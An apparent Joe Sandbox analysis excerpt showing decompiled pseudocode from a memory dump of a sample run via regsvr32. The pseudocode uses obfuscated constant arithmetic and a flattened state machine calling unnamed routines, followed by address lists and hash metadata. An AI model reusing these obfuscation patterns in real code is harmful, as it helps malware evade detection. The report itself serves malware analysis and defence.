				_v2748 = _v2748 | 0xf57e3de9;
				_v2748 = _v2748 ^ 0xf7fc61d2;
				_v2672 = 0x8a6c6a;
				_v2672 = _v2672 ^ 0x8159647f;
				_v2672 = _v2672 ^ 0x81d1eba0;
				_v2668 = 0x14c691;
				_v2668 = _v2668 * 0x1f;
				_v2668 = _v2668 ^ 0x028c2397;
				_v2772 = 0xa14e1;
				_v2772 = _v2772 | 0x19f1b858;
				_v2772 = _v2772 << 2;
				_v2772 = _v2772 ^ 0x67e88e1f;
				_v2880 = 0x9fa027;
				_v2880 = _v2880 ^ 0xc144da70;
				_v2880 = _v2880 + 0x5be6;
				_v2880 = _v2880 / _t787;
				_v2880 = _v2880 ^ 0x037ae0c9;
				_v2928 = 0x3abeda;
				_v2928 = _v2928 ^ 0x65736d93;
				_v2928 = _v2928 + 0xffff310e;
				_v2928 = _v2928 >> 4;
				_v2928 = _v2928 ^ 0x065963c7;
				_v2640 = 0x16f4bd;
				_v2640 = _v2640 * 0xe;
				_v2640 = _v2640 ^ 0x014d995f;
				_v2856 = 0x730f71;
				_v2856 = _v2856 << 0xb;
				_v2856 = _v2856 >> 0xa;
				_v2856 = _v2856 << 5;
				_v2856 = _v2856 ^ 0x04cf5b82;
				_v2920 = 0xf51a1d;
				_v2920 = _v2920 >> 6;
				_v2920 = _v2920 + 0xffff790e;
				_v2920 = _v2920 + 0xffff8eb8;
				_v2920 = _v2920 ^ 0x000b35f2;
				_v2724 = 0xc9e4e6;
				_v2724 = _v2724 >> 8;
				_v2724 = _v2724 ^ 0x0007ad00;
				_v2912 = 0x6a366d;
				_v2912 = _v2912 >> 0xe;
				_v2912 = _v2912 + 0xfffff0e4;
				_v2912 = _v2912 + 0xca29;
				_v2912 = _v2912 ^ 0x000b8696;
				_v2756 = 0xad1b1;
				_v2756 = _v2756 >> 0xf;
				_v2756 = _v2756 >> 0x10;
				_v2756 = _v2756 ^ 0x0009a54d;
				_v2796 = 0x33c6c6;
				_v2796 = _v2796 | 0x67dfdf79;
				_v2796 = _v2796 ^ 0x67fc33cd;
				_v2736 = 0x18acfe;
				_v2736 = _v2736 * 0x2a;
				_v2736 = _v2736 ^ 0x0403da01;
				_v2660 = 0x33d7fb;
				_v2660 = _v2660 * 0x16;
				_v2660 = _v2660 ^ 0x0476d0c2;
				_v2840 = 0xb3cfa4;
				_v2840 = _v2840 >> 4;
				_v2840 = _v2840 << 0xb;
				_v2840 = _v2840 << 7;
				_v2840 = _v2840 ^ 0xf3eb746f;
				_v2904 = 0x4128b5;
				_t862 = 0x45;
				_v2904 = _v2904 / _t862;
				_t788 = 0xc;
				_t782 = 0x6c;
				_v2904 = _v2904 * 0x73;
				_v2904 = _v2904 | 0xe6a63561;
				_v2904 = _v2904 ^ 0xe6ef689d;
				_v2872 = 0x23c8cf;
				_v2872 = _v2872 * 0x60;
				_v2872 = _v2872 << 7;
				_v2872 = _v2872 ^ 0x0312d5df;
				_v2872 = _v2872 ^ 0xb6b6220d;
				_v2656 = 0xc7c9d4;
				_v2656 = _v2656 / _t788;
				_v2656 = _v2656 ^ 0x0013e48d;
				_v2684 = 0xc1de2e;
				_v2684 = _v2684 << 6;
				_v2684 = _v2684 ^ 0x307445df;
				_v2908 = 0x8efd4b;
				_v2908 = _v2908 ^ 0x938b2fc9;
				_v2908 = _v2908 << 0xd;
				_v2908 = _v2908 / _t782;
				_v2908 = _v2908 ^ 0x01bff107;
				_v2916 = 0x57c251;
				_v2916 = _v2916 / _t862;
				_v2916 = _v2916 << 3;
				_v2916 = _v2916 | 0x63b3f351;
				_v2916 = _v2916 ^ 0x63b1fd09;
				_v2792 = 0x618ad3;
				_v2792 = _v2792 >> 2;
				_t789 = 0x78;
				_v2792 = _v2792 * 0x7f;
				_v2792 = _v2792 ^ 0x0c16deab;
				_v2800 = 0xd1b694;
				_v2800 = _v2800 << 5;
				_v2800 = _v2800 << 2;
				_v2800 = _v2800 ^ 0x68d421c3;
				_v2732 = 0xf908e9;
				_v2732 = _v2732 << 4;
				_v2732 = _v2732 ^ 0x0f915e9f;
				_v2776 = 0x4b71bd;
				_v2776 = _v2776 << 0x10;
				_v2776 = _v2776 + 0xec33;
				_v2776 = _v2776 ^ 0x71baf019;
				_v2900 = 0xd9d679;
				_v2900 = _v2900 << 6;
				_v2900 = _v2900 * 0x52;
				_v2900 = _v2900 << 0xe;
				_v2900 = _v2900 ^ 0x2c232e41;
				_v2648 = 0xd12b32;
				_v2648 = _v2648 | 0x74e47b5c;
				_v2648 = _v2648 ^ 0x74fd2515;
				_v2784 = 0xd7e3e1;
				_v2784 = _v2784 / _t789;
				_v2784 = _v2784 ^ 0x3d96c0ba;
				_v2784 = _v2784 ^ 0x3d9f1646;
				_v2676 = 0x636ad3;
				_v2676 = _v2676 | 0x5b3da741;
				_v2676 = _v2676 ^ 0x5b732082;
				_v2896 = 0x3505cb;
				_v2896 = _v2896 ^ 0x34607be3;
				_v2896 = _v2896 | 0x36f61c3b;
				_v2896 = _v2896 ^ 0x64d6e971;
				_v2896 = _v2896 ^ 0x522ade29;
				_v2708 = 0xe6bb5d;
				_v2708 = _v2708 ^ 0x2001a0b1;
				_v2708 = _v2708 ^ 0x20e0752c;
				_v2788 = 0x1e0f5a;
				_v2788 = _v2788 ^ 0xc80b17f8;
				_v2788 = _v2788 + 0xffff3a3b;
				_v2788 = _v2788 ^ 0xc81e2fe4;
				_v2704 = 0x57b7aa;
				_v2704 = _v2704 << 1;
				_v2704 = _v2704 ^ 0x00a3a143;
				_v2712 = 0x14a837;
				_v2712 = _v2712 ^ 0xfc28968d;
				_v2712 = _v2712 ^ 0xfc32f9c6;
				_v2700 = 0xbe166b;
				_v2700 = _v2700 ^ 0x376b6bd2;
				_v2700 = _v2700 ^ 0x37df03cf;
				_v2888 = 0x93f92f;
				_t790 = 0x29;
				_v2888 = _v2888 * 0x6a;
				_v2888 = _v2888 << 4;
				_v2888 = _v2888 + 0xffff8eb1;
				_v2888 = _v2888 ^ 0xd45d2676;
				_v2864 = 0xc62b98;
				_v2864 = _v2864 + 0x368f;
				_v2864 = _v2864 << 1;
				_v2864 = _v2864 + 0xffff5f1f;
				_v2864 = _v2864 ^ 0x018c8492;
				_v2644 = 0xe494a2;
				_v2644 = _v2644 / _t790;
				_v2644 = _v2644 ^ 0x000fa805;
				_v2816 = 0x14bc76;
				_v2816 = _v2816 + 0xffff6b05;
				_v2816 = _v2816 | 0xcbc3cf74;
				_v2816 = _v2816 ^ 0xcbd90f84;
				_v2932 = 0x263bc1;
				_v2932 = _v2932 + 0xffffe974;
				_t791 = 0x12;
				_v2932 = _v2932 * 0x4b;
				_v2932 = _v2932 >> 9;
				_v2932 = _v2932 ^ 0x00057b1a;
				_v2828 = 0xfe7f90;
				_v2828 = _v2828 * 0x27;
				_v2828 = _v2828 ^ 0x416b71e4;
				_v2828 = _v2828 ^ 0x67ac9e72;
				_v2940 = 0x916b3a;
				_v2940 = _v2940 / _t791;
				_v2940 = _v2940 + 0xffffc7da;
				_v2940 = _v2940 << 0xf;
				_v2940 = _v2940 ^ 0xee0257da;
				_v2764 = 0x371bc7;
				_v2764 = _v2764 + 0x748a;
				_v2764 = _v2764 + 0xffd2;
				_v2764 = _v2764 ^ 0x0037de40;
				_v2652 = 0x5ca484;
				_v2652 = _v2652 << 1;
				_v2652 = _v2652 ^ 0x00b1de82;
				_v2924 = 0xceca1c;
				_v2924 = _v2924 >> 7;
				_v2924 = _v2924 | 0x18ebbb65;
				_v2924 = _v2924 >> 0xf;
				_v2924 = _v2924 ^ 0x00026b49;
				_v2832 = 0x5f4924;
				_v2832 = _v2832 << 0xc;
				_t792 = 0x50;
				_v2832 = _v2832 / _t792;
				_v2832 = _v2832 ^ 0x03054b31;
				_v2664 = 0x746b1b;
				_v2664 = _v2664 ^ 0x4928924a;
				_v2664 = _v2664 ^ 0x495634ca;
				_v2692 = 0x59869d;
				_v2692 = _v2692 + 0xffffefeb;
				_v2692 = _v2692 ^ 0x005ba4bc;
				_v2836 = 0x7503fc;
				_v2836 = _v2836 << 9;
				_t793 = 0x37;
				_v2836 = _v2836 * 0x34;
				_v2836 = _v2836 + 0xffff7657;
				_v2836 = _v2836 ^ 0x899da61a;
				_v2844 = 0x25a46d;
				_v2844 = _v2844 + 0x507b;
				_v2844 = _v2844 + 0xe7de;
				_v2844 = _v2844 ^ 0x1795686d;
				_v2844 = _v2844 ^ 0x17b10779;
				_v2852 = 0x514f8a;
				_v2852 = _v2852 / _t793;
				_t794 = 0x38;
				_v2852 = _v2852 * 0x21;
				_v2852 = _v2852 + 0xfffff57f;
				_v2852 = _v2852 ^ 0x003d7ccd;
				_v2860 = 0xb7dac6;
				_v2860 = _v2860 + 0xd92e;
				_v2860 = _v2860 + 0xbe66;
				_v2860 = _v2860 ^ 0xdcd1d129;
				_v2860 = _v2860 ^ 0xdc6851e7;
				_v2876 = 0xed64fb;
				_v2876 = _v2876 / _t782;
				_v2876 = _v2876 * 0x61;
				_v2876 = _v2876 + 0xfffff8b0;
				_v2876 = _v2876 ^ 0x00d937ca;
				_v2696 = 0x74014f;
				_v2696 = _v2696 >> 1;
				_v2696 = _v2696 ^ 0x0033813e;
				_v2868 = 0xf765d3;
				_v2868 = _v2868 * 0x6b;
				_v2868 = _v2868 << 1;
				_v2868 = _v2868 >> 7;
				_v2868 = _v2868 ^ 0x0195d618;
				_v2688 = 0x1e6ce4;
				_v2688 = _v2688 / _t794;
				_v2688 = _v2688 ^ 0x000657ad;
				_v2744 = 0x83a67e;
				_t795 = 0x3d;
				_v2744 = _v2744 * 0x6a;
				_v2744 = _v2744 + 0x64ff;
				_v2744 = _v2744 ^ 0x368cba62;
				_v2740 = 0xb82ec2;
				_v2740 = _v2740 + 0xa010;
				_v2740 = _v2740 ^ 0x00bae81e;
				_v2680 = 0x7d2d5e;
				_v2680 = _v2680 / _t795;
				_v2680 = _v2680 ^ 0x000586e8;
				_t749 = E001A8CE7();
				_t863 = _v2740;
				_t783 = _t749;
				while(1) {
					L1:
					_t750 = 0x258eaf2;
					do {
						while(1) {
							L2:
							_t879 = _t864 - 0x7a80817;
							if(_t879 > 0) {
								break;
							}
							if(_t879 == 0) {
								_t756 = E001B7E3D(_v2632, _v2704, _v2636, _v2712);
								_t863 = _t756;
								__eflags = _t756;
								_t750 = 0x258eaf2;
								_pop(_t795);
								_t864 =  !=  ? 0x258eaf2 : 0xaed86a1;
								continue;
							} else {
								if(_t864 == 0x404cf9) {
									_t795 = _v2884;
									E001A3466(_v2884, _v2752, _v2884, _v2884,  &_v1044, _v2892, _v2884, _v2720, _v2760, _v2728);
									_t870 =  &(_t870[8]);
									_t864 = 0x4c47ac2;
									while(1) {
										L1:
										_t750 = 0x258eaf2;
										goto L2;
									}
								} else {
									if(_t864 == 0x20cde6c) {
										_v2624 = E001AA82D();
										_v2620 = 2 + E001B0184(_v2908, _v2916, _t761, _v2792, _v2800) * 2;
										_t795 = _v2732;
										_t750 = E001B68C8(_v2732, _t783, _v2768, _v2908, _t783, _v2776, _v2908,  &_v2628, _v2900, _v2648, _t783, _v2784, _v2676);
										_t870 =  &(_t870[0xe]);
										__eflags = _t750;
										if(__eflags != 0) {
											_t864 = 0x26113c1;
											while(1) {
												L1:
												_t750 = 0x258eaf2;
												goto L2;
											}
										}
									} else {
										if(_t864 == _t750) {
											_push(_v2644);
											_push(0x1a11f8);
											_push(_v2864);
											_t866 = E001BF5D9(_v2700, _v2888, __eflags);
											E001AD467(_v2932, __eflags, _v2828,  &_v2604, _v2700, _v2940, _t863, _v2764, _t866,  &_v524,  &_v1044, _v2652);
											_t795 = _t866;
											E001BF94B(_t866, _v2924, _v2832, _v2664, _v2692);
											_t870 =  &(_t870[0x10]);
											_t864 = 0x893dd53;
											while(1) {
												L1:
												_t750 = 0x258eaf2;
												goto L2;
											}
										} else {
											if(_t864 == 0x26113c1) {
												_t795 =  &_v2636;
												E001AA4DE( &_v2636, _v2896, _v2708,  &_v2628, _v2788);
												_t870 =  &(_t870[3]);
												asm("sbb esi, esi");
												_t864 = (_t864 & 0xff9e5dab) + 0x809aa6c;
												while(1) {
													L1:
													_t750 = 0x258eaf2;
													goto L2;
												}
											} else {
												_t884 = _t864 - 0x4c47ac2;
												if(_t864 != 0x4c47ac2) {
													goto L25;
												} else {
													E001C0575(_v2936, _v2824, _t884, _t795,  &_v2084, _v2820);
													 *((short*)(E001A2263( &_v2084, _v2812, _v2780, _v2716))) = 0;
													E001B9054(_v2848,  &_v1564, _t884, _v2804, _v2748, _v2672);
													_push(_v2928);
													_push(0x1a1188);
													_push(_v2880);
													E001B8EB3( &_v2084, _t884, _v2640, _v2668, _v2856,  &_v2604, _v2920, E001BF5D9(_v2668, _v2772, _t884), _v2724);
													E001BF94B(_t778, _v2912, _v2756, _v2796, _v2736);
													_t795 =  &_v2604;
													_t750 = E001C05F6( &_v2604, _t869, _v2660, _v2840, _v2904, _v2872);
													_t870 =  &(_t870[0x19]);
													if(_t750 != 0) {
														_t864 = 0x20cde6c;
														while(1) {
															L1:
															_t750 = 0x258eaf2;
															goto L2;
														}
													}
												}
											}
										}
									}
								}
							}
							goto L26;
						}
						__eflags = _t864 - 0x809aa6c;
						if(_t864 == 0x809aa6c) {
							E001B02D8(_v2628, _v2744, _v2740, _v2680);
							_pop(_t795);
							_t864 = 0x1afddb0;
							_t750 = 0x258eaf2;
							goto L25;
						} else {
							__eflags = _t864 - 0x893dd53;
							if(__eflags == 0) {
								_t795 = _v2836;
								E001B4E54(_v2836, 1, __eflags,  &_v524, 0, _v2844, 0, _v2852, _v2836, _v2860);
								_t870 =  &(_t870[7]);
								_t864 = 0xf8a063e;
								goto L1;
							} else {
								__eflags = _t864 - 0xaed86a1;
								if(_t864 == 0xaed86a1) {
									E001B17D2(_v2868, _v2688, _v2636);
									_pop(_t795);
									_t864 = 0x809aa6c;
									while(1) {
										L1:
										_t750 = 0x258eaf2;
										goto L2;
									}
								} else {
									__eflags = _t864 - 0xf8a063e;
									if(_t864 != 0xf8a063e) {
										goto L25;
									} else {
										E001B17D2(_v2876, _v2696, _t863);
										_pop(_t795);
										_t864 = 0xaed86a1;
										while(1) {
											L1:
											_t750 = 0x258eaf2;
											goto L2;
										}
									}
								}
							}
						}
						break;
						L25:
						__eflags = _t864 - 0x1afddb0;
					} while (__eflags != 0);
					L26:
					return _t750;
				}
			}

















































































































                                                                                                                0x001ad4bc
                                                                                                                0x001ad4c2
                                                                                                                0x001ad4cc
                                                                                                                0x001ad4d7
                                                                                                                0x001ad4e2
                                                                                                                0x001ad4ea
                                                                                                                0x001ad4ef
                                                                                                                0x001ad4f7
                                                                                                                0x001ad4ff
                                                                                                                0x001ad50a
                                                                                                                0x001ad515
                                                                                                                0x001ad520
                                                                                                                0x001ad52b
                                                                                                                0x001ad542
                                                                                                                0x001ad549
                                                                                                                0x001ad552
                                                                                                                0x001ad559
                                                                                                                0x001ad55e
                                                                                                                0x001ad567
                                                                                                                0x001ad572
                                                                                                                0x001ad57d
                                                                                                                0x001ad590
                                                                                                                0x001ad591
                                                                                                                0x001ad598
                                                                                                                0x001ad5a3
                                                                                                                0x001ad5ab
                                                                                                                0x001ad5b5
                                                                                                                0x001ad5b9
                                                                                                                0x001ad5c1
                                                                                                                0x001ad5c9
                                                                                                                0x001ad5d4
                                                                                                                0x001ad5df
                                                                                                                0x001ad5ea
                                                                                                                0x001ad5f5
                                                                                                                0x001ad5fd
                                                                                                                0x001ad608
                                                                                                                0x001ad613
                                                                                                                0x001ad61e
                                                                                                                0x001ad626
                                                                                                                0x001ad62d
                                                                                                                0x001ad638
                                                                                                                0x001ad640
                                                                                                                0x001ad64e
                                                                                                                0x001ad652
                                                                                                                0x001ad657
                                                                                                                0x001ad65f
                                                                                                                0x001ad66a
                                                                                                                0x001ad675
                                                                                                                0x001ad67d
                                                                                                                0x001ad688
                                                                                                                0x001ad693
                                                                                                                0x001ad69e
                                                                                                                0x001ad6a9
                                                                                                                0x001ad6b4
                                                                                                                0x001ad6bf
                                                                                                                0x001ad6ca
                                                                                                                0x001ad6d5
                                                                                                                0x001ad6e0
                                                                                                                0x001ad6eb
                                                                                                                0x001ad6f6
                                                                                                                0x001ad701
                                                                                                                0x001ad70c
                                                                                                                0x001ad71f
                                                                                                                0x001ad726
                                                                                                                0x001ad731
                                                                                                                0x001ad73e
                                                                                                                0x001ad744
                                                                                                                0x001ad74c
                                                                                                                0x001ad754
                                                                                                                0x001ad75c
                                                                                                                0x001ad767
                                                                                                                0x001ad77c
                                                                                                                0x001ad77d
                                                                                                                0x001ad784
                                                                                                                0x001ad78f
                                                                                                                0x001ad79a
                                                                                                                0x001ad7a5
                                                                                                                0x001ad7b0
                                                                                                                0x001ad7bb
                                                                                                                0x001ad7c6
                                                                                                                0x001ad7d1
                                                                                                                0x001ad7dc
                                                                                                                0x001ad7ef
                                                                                                                0x001ad7f6
                                                                                                                0x001ad801
                                                                                                                0x001ad80c
                                                                                                                0x001ad817
                                                                                                                0x001ad81f
                                                                                                                0x001ad82a
                                                                                                                0x001ad832
                                                                                                                0x001ad83a
                                                                                                                0x001ad848
                                                                                                                0x001ad84c
                                                                                                                0x001ad854
                                                                                                                0x001ad85c
                                                                                                                0x001ad864
                                                                                                                0x001ad86c
                                                                                                                0x001ad871
                                                                                                                0x001ad879
                                                                                                                0x001ad88c
                                                                                                                0x001ad893
                                                                                                                0x001ad89e
                                                                                                                0x001ad8a6
                                                                                                                0x001ad8ab
                                                                                                                0x001ad8b0
                                                                                                                0x001ad8b5
                                                                                                                0x001ad8bd
                                                                                                                0x001ad8c5
                                                                                                                0x001ad8ca
                                                                                                                0x001ad8d2
                                                                                                                0x001ad8da
                                                                                                                0x001ad8e2
                                                                                                                0x001ad8ed
                                                                                                                0x001ad8f5
                                                                                                                0x001ad900
                                                                                                                0x001ad908
                                                                                                                0x001ad90d
                                                                                                                0x001ad915
                                                                                                                0x001ad91d
                                                                                                                0x001ad925
                                                                                                                0x001ad930
                                                                                                                0x001ad938
                                                                                                                0x001ad940
                                                                                                                0x001ad94b
                                                                                                                0x001ad956
                                                                                                                0x001ad961
                                                                                                                0x001ad96c
                                                                                                                0x001ad97f
                                                                                                                0x001ad986
                                                                                                                0x001ad991
                                                                                                                0x001ad9a4
                                                                                                                0x001ad9ab
                                                                                                                0x001ad9b6
                                                                                                                0x001ad9be
                                                                                                                0x001ad9c3
                                                                                                                0x001ad9c8
                                                                                                                0x001ad9cd
                                                                                                                0x001ad9d5
                                                                                                                0x001ad9e5
                                                                                                                0x001ad9ea
                                                                                                                0x001ad9f5
                                                                                                                0x001ad9f8
                                                                                                                0x001ad9f9
                                                                                                                0x001ad9fd
                                                                                                                0x001ada05
                                                                                                                0x001ada0d
                                                                                                                0x001ada1c
                                                                                                                0x001ada20
                                                                                                                0x001ada25
                                                                                                                0x001ada2d
                                                                                                                0x001ada35
                                                                                                                0x001ada4b
                                                                                                                0x001ada52
                                                                                                                0x001ada5d
                                                                                                                0x001ada68
                                                                                                                0x001ada70
                                                                                                                0x001ada7b
                                                                                                                0x001ada83
                                                                                                                0x001ada8b
                                                                                                                0x001ada98
                                                                                                                0x001ada9c
                                                                                                                0x001adaa4
                                                                                                                0x001adab4
                                                                                                                0x001adab8
                                                                                                                0x001adabd
                                                                                                                0x001adac5
                                                                                                                0x001adacd
                                                                                                                0x001adad8
                                                                                                                0x001adae8
                                                                                                                0x001adae9
                                                                                                                0x001adaf0
                                                                                                                0x001adafb
                                                                                                                0x001adb06
                                                                                                                0x001adb0e
                                                                                                                0x001adb16
                                                                                                                0x001adb21
                                                                                                                0x001adb2c
                                                                                                                0x001adb34
                                                                                                                0x001adb3f
                                                                                                                0x001adb4a
                                                                                                                0x001adb52
                                                                                                                0x001adb5d
                                                                                                                0x001adb68
                                                                                                                0x001adb70
                                                                                                                0x001adb7a
                                                                                                                0x001adb7e
                                                                                                                0x001adb83
                                                                                                                0x001adb8b
                                                                                                                0x001adb96
                                                                                                                0x001adba1
                                                                                                                0x001adbac
                                                                                                                0x001adbc0
                                                                                                                0x001adbc7
                                                                                                                0x001adbd2
                                                                                                                0x001adbdd
                                                                                                                0x001adbe8
                                                                                                                0x001adbf5
                                                                                                                0x001adc00
                                                                                                                0x001adc08
                                                                                                                0x001adc10
                                                                                                                0x001adc18
                                                                                                                0x001adc20
                                                                                                                0x001adc28
                                                                                                                0x001adc33
                                                                                                                0x001adc3e
                                                                                                                0x001adc49
                                                                                                                0x001adc54
                                                                                                                0x001adc5f
                                                                                                                0x001adc6a
                                                                                                                0x001adc75
                                                                                                                0x001adc80
                                                                                                                0x001adc87
                                                                                                                0x001adc92
                                                                                                                0x001adc9d
                                                                                                                0x001adca8
                                                                                                                0x001adcb3
                                                                                                                0x001adcbe
                                                                                                                0x001adcc9
                                                                                                                0x001adcd4
                                                                                                                0x001adce3
                                                                                                                0x001adce6
                                                                                                                0x001adcea
                                                                                                                0x001adcef
                                                                                                                0x001adcf7
                                                                                                                0x001adcff
                                                                                                                0x001add07
                                                                                                                0x001add0f
                                                                                                                0x001add13
                                                                                                                0x001add1b
                                                                                                                0x001add23
                                                                                                                0x001add39
                                                                                                                0x001add40
                                                                                                                0x001add4b
                                                                                                                0x001add56
                                                                                                                0x001add61
                                                                                                                0x001add6c
                                                                                                                0x001add77
                                                                                                                0x001add7f
                                                                                                                0x001add8c
                                                                                                                0x001add8d
                                                                                                                0x001add91
                                                                                                                0x001add96
                                                                                                                0x001add9e
                                                                                                                0x001addb1
                                                                                                                0x001addb8
                                                                                                                0x001addc3
                                                                                                                0x001addce
                                                                                                                0x001adddc
                                                                                                                0x001adde0
                                                                                                                0x001adde8
                                                                                                                0x001added
                                                                                                                0x001addf5
                                                                                                                0x001ade00
                                                                                                                0x001ade0b
                                                                                                                0x001ade16
                                                                                                                0x001ade21
                                                                                                                0x001ade2c
                                                                                                                0x001ade33
                                                                                                                0x001ade3e
                                                                                                                0x001ade46
                                                                                                                0x001ade4b
                                                                                                                0x001ade53
                                                                                                                0x001ade58
                                                                                                                0x001ade60
                                                                                                                0x001ade68
                                                                                                                0x001ade75
                                                                                                                0x001ade7a
                                                                                                                0x001ade7e
                                                                                                                0x001ade86
                                                                                                                0x001ade91
                                                                                                                0x001ade9c
                                                                                                                0x001adea7
                                                                                                                0x001adeb2
                                                                                                                0x001adebd
                                                                                                                0x001adec8
                                                                                                                0x001aded0
                                                                                                                0x001adedc
                                                                                                                0x001adedf
                                                                                                                0x001adee3
                                                                                                                0x001adeeb
                                                                                                                0x001adef3
                                                                                                                0x001adefb
                                                                                                                0x001adf03
                                                                                                                0x001adf0b
                                                                                                                0x001adf13
                                                                                                                0x001adf1b
                                                                                                                0x001adf2b
                                                                                                                0x001adf34
                                                                                                                0x001adf37
                                                                                                                0x001adf3b
                                                                                                                0x001adf43
                                                                                                                0x001adf4b
                                                                                                                0x001adf53
                                                                                                                0x001adf5b
                                                                                                                0x001adf63
                                                                                                                0x001adf6b
                                                                                                                0x001adf73
                                                                                                                0x001adf83
                                                                                                                0x001adf8c
                                                                                                                0x001adf90
                                                                                                                0x001adf98
                                                                                                                0x001adfa0
                                                                                                                0x001adfab
                                                                                                                0x001adfb2
                                                                                                                0x001adfbd
                                                                                                                0x001adfca
                                                                                                                0x001adfce
                                                                                                                0x001adfd2
                                                                                                                0x001adfd7
                                                                                                                0x001adfdf
                                                                                                                0x001adff5
                                                                                                                0x001adffc
                                                                                                                0x001ae007
                                                                                                                0x001ae01a
                                                                                                                0x001ae01b
                                                                                                                0x001ae022
                                                                                                                0x001ae02d
                                                                                                                0x001ae038
                                                                                                                0x001ae043
                                                                                                                0x001ae04e
                                                                                                                0x001ae059
                                                                                                                0x001ae06d
                                                                                                                0x001ae074
                                                                                                                0x001ae086
                                                                                                                0x001ae08b
                                                                                                                0x001ae092
                                                                                                                0x001ae094
                                                                                                                0x001ae094
                                                                                                                0x001ae094
                                                                                                                0x001ae099
                                                                                                                0x001ae099
                                                                                                                0x001ae099
                                                                                                                0x001ae099
                                                                                                                0x001ae09f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001ae0a5
                                                                                                                0x001ae3d9
                                                                                                                0x001ae3de
                                                                                                                0x001ae3e5
                                                                                                                0x001ae3e7
                                                                                                                0x001ae3ed
                                                                                                                0x001ae3ee
                                                                                                                0x00000000
                                                                                                                0x001ae0ab
                                                                                                                0x001ae0b1
                                                                                                                0x001ae3a7
                                                                                                                0x001ae3ab
                                                                                                                0x001ae3b0
                                                                                                                0x001ae3b3
                                                                                                                0x001ae094
                                                                                                                0x001ae094
                                                                                                                0x001ae094
                                                                                                                0x00000000
                                                                                                                0x001ae094
                                                                                                                0x001ae0b7
                                                                                                                0x001ae0bd
                                                                                                                0x001ae2f9
                                                                                                                0x001ae328
                                                                                                                0x001ae35b
                                                                                                                0x001ae362
                                                                                                                0x001ae367
                                                                                                                0x001ae36a
                                                                                                                0x001ae36c
                                                                                                                0x001ae372
                                                                                                                0x001ae094
                                                                                                                0x001ae094
                                                                                                                0x001ae094
                                                                                                                0x00000000
                                                                                                                0x001ae094
                                                                                                                0x001ae094
                                                                                                                0x001ae0c3
                                                                                                                0x001ae0c5
                                                                                                                0x001ae249
                                                                                                                0x001ae250
                                                                                                                0x001ae255
                                                                                                                0x001ae26c
                                                                                                                0x001ae2ad
                                                                                                                0x001ae2b9
                                                                                                                0x001ae2cd
                                                                                                                0x001ae2d2
                                                                                                                0x001ae2d5
                                                                                                                0x001ae094
                                                                                                                0x001ae094
                                                                                                                0x001ae094
                                                                                                                0x00000000
                                                                                                                0x001ae094
                                                                                                                0x001ae0cb
                                                                                                                0x001ae0d1
                                                                                                                0x001ae225
                                                                                                                0x001ae22c
                                                                                                                0x001ae231
                                                                                                                0x001ae236
                                                                                                                0x001ae23e
                                                                                                                0x001ae094
                                                                                                                0x001ae094
                                                                                                                0x001ae094
                                                                                                                0x00000000
                                                                                                                0x001ae094
                                                                                                                0x001ae0d7
                                                                                                                0x001ae0d7
                                                                                                                0x001ae0dd
                                                                                                                0x00000000
                                                                                                                0x001ae0e3
                                                                                                                0x001ae0fe
                                                                                                                0x001ae13e
                                                                                                                0x001ae14f
                                                                                                                0x001ae157
                                                                                                                0x001ae15b
                                                                                                                0x001ae160
                                                                                                                0x001ae1aa
                                                                                                                0x001ae1cd
                                                                                                                0x001ae1d5
                                                                                                                0x001ae1f1
                                                                                                                0x001ae1f6
                                                                                                                0x001ae1fb
                                                                                                                0x001ae201
                                                                                                                0x001ae094
                                                                                                                0x001ae094
                                                                                                                0x001ae094
                                                                                                                0x00000000
                                                                                                                0x001ae094
                                                                                                                0x001ae094
                                                                                                                0x001ae1fb
                                                                                                                0x001ae0dd
                                                                                                                0x001ae0d1
                                                                                                                0x001ae0c5
                                                                                                                0x001ae0bd
                                                                                                                0x001ae0b1
                                                                                                                0x00000000
                                                                                                                0x001ae0a5
                                                                                                                0x001ae3f6
                                                                                                                0x001ae3fc
                                                                                                                0x001ae4b0
                                                                                                                0x001ae4b6
                                                                                                                0x001ae4b7
                                                                                                                0x001ae4bc
                                                                                                                0x00000000
                                                                                                                0x001ae402
                                                                                                                0x001ae402
                                                                                                                0x001ae408
                                                                                                                0x001ae478
                                                                                                                0x001ae482
                                                                                                                0x001ae487
                                                                                                                0x001ae48a
                                                                                                                0x00000000
                                                                                                                0x001ae40a
                                                                                                                0x001ae40a
                                                                                                                0x001ae410
                                                                                                                0x001ae44c
                                                                                                                0x001ae451
                                                                                                                0x001ae452
                                                                                                                0x001ae094
                                                                                                                0x001ae094
                                                                                                                0x001ae094
                                                                                                                0x00000000
                                                                                                                0x001ae094
                                                                                                                0x001ae412
                                                                                                                0x001ae412
                                                                                                                0x001ae418
                                                                                                                0x00000000
                                                                                                                0x001ae41e
                                                                                                                0x001ae42a
                                                                                                                0x001ae42f
                                                                                                                0x001ae430
                                                                                                                0x001ae094
                                                                                                                0x001ae094
                                                                                                                0x001ae094
                                                                                                                0x00000000
                                                                                                                0x001ae094
                                                                                                                0x001ae094
                                                                                                                0x001ae418
                                                                                                                0x001ae410
                                                                                                                0x001ae408
                                                                                                                0x00000000
                                                                                                                0x001ae4c1
                                                                                                                0x001ae4c1
                                                                                                                0x001ae4c1
                                                                                                                0x001ae4d7
                                                                                                                0x001ae4d7
                                                                                                                0x001ae4d7

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseFolderHandlePath
                                                                                                                • String ID: $I_$,u $3$A.#,$\{t$^-}$m6j$x-${P$[$qkA${`4
                                                                                                                • API String ID: 1943059022-272997853
                                                                                                                • Opcode ID: 5aa7ef3bc3032283710db21069f389e1af563b08daa208b6c499b878d646ac69
                                                                                                                • Instruction ID: f95d04d8c7b88cb5d25f9ac40db7688008839f75825128be40444199838c8b9a
                                                                                                                • Opcode Fuzzy Hash: 5aa7ef3bc3032283710db21069f389e1af563b08daa208b6c499b878d646ac69
                                                                                                                • Instruction Fuzzy Hash: 9B820F715093809FD3B9CF25D58AB8BBBE1BBC5708F10891DE6DA96260D7B08949CF43
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

